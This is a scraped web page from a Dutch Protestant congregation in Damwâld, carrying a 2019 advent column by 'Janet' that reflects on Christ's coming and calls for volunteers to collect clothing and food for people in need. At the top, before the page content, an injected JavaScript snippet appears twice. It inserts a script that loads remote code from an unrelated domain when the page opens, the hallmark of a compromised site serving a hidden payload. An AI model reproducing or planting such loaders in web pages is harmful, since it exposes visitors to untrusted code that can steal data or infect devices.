;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Op weg naar Kerst - PKN Damwâld

Op weg naar Kerst

Gepubliceerd op: vrijdag 13 december 2019

De advent is in het christendom de benaming voor de aanloopperiode naar kerst. De naam advent komt van het Latijnse woord adventus, dat komst betekent. In de adventsperiode bereiden christenen zich voor op het kerstfeest: op de komst van Jezus, het Licht der Wereld.

Een mooie periode, maar staan we er genoeg bij stil? Het is een vertrouwd ritueel, het aansteken van de kaarsen, het lezen van de bekende verhalen over de geboorte van Johannes, en Jezus. Daarmee is het risico, dat het ultieme van advent aan ons voorbij gaat: het grote wonder van Zijn komst. Dat het al ‘gewoon’ is. Dat is het natuurlijk helemaal niet! Het is een groot wonder, een teken van Gods grote liefde voor ons mensen, een bijzonder en uniek gebeuren!

Tegelijkertijd mogen we stilstaan bij mensen die niet van deze boodschap weten, of niet kunnen genieten van deze periode, door armoede, eenzaamheid, of onzekerheid over gezondheid, gezin. Daarom lijkt juist deze tijd een mooi moment om daar samen iets aan te doen. Ik zou graag zien, dat we samen het verschil proberen te maken voor enkelen van hen. Kunnen we samen iets bedenken en doen door het inzamelen van warme kleding, voedsel en meer?

#opzoeknaarvrijwilligers #wiedoetermee? #samenstaanwesterk

Wil je wat doen? Mail dan naar alkema.janet@gmail.com, dan gaan we samen aan de slag.

 

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns